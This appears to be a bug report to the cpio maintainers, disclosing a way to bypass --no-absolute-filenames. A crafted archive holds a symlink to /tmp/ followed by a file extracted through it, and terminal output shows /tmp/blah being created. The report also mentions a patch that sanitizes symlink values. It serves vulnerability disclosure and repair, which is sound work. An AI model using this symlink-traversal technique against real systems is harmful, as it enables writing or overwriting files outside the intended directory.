Hi,
Looking at cpio, i found what seems to be a way to bypass the
--no-absolute-filenames option, which supposedly prevents data to be
written outside of the current folder.
One just need to create a cpio archive that
contains a symlink to the required destination, then a file that appears to be from inside the
symlink (this requires a specially crafted cpio archive) :
1) there is no file called /tmp/blah
address@hidden testings]$ ll
total 4
-rw-rw-r--. 1 cedric cedric 384 Jun 4 22:34 link.cpio
address@hidden testings]$ ll /tmp/blah
ls: cannot access '/tmp/blah': No such file or directory
2) I extract the specially crafted cpio
address@hidden testings]$ cpio -idv --no-absolute-filenames < link.cpio
link
link/blah
1 block
3) there is a file /tmp/blah
address@hidden testings]$ ll
total 4
lrwxrwxrwx. 1 cedric cedric 5 Jun 4 22:21 link -> /tmp/
-rw-rw-r--. 1 cedric cedric 384 Jun 4 22:15 link.cpio
address@hidden testings]$ ll /tmp/blah
-rw-rw-r--. 1 cedric cedric 3 Jun 4 22:21 /tmp/blah
The very naive patch attached makes use of safer_name_suffix() to sanitize symlink's value.
symlink-safer_name_suffix.patch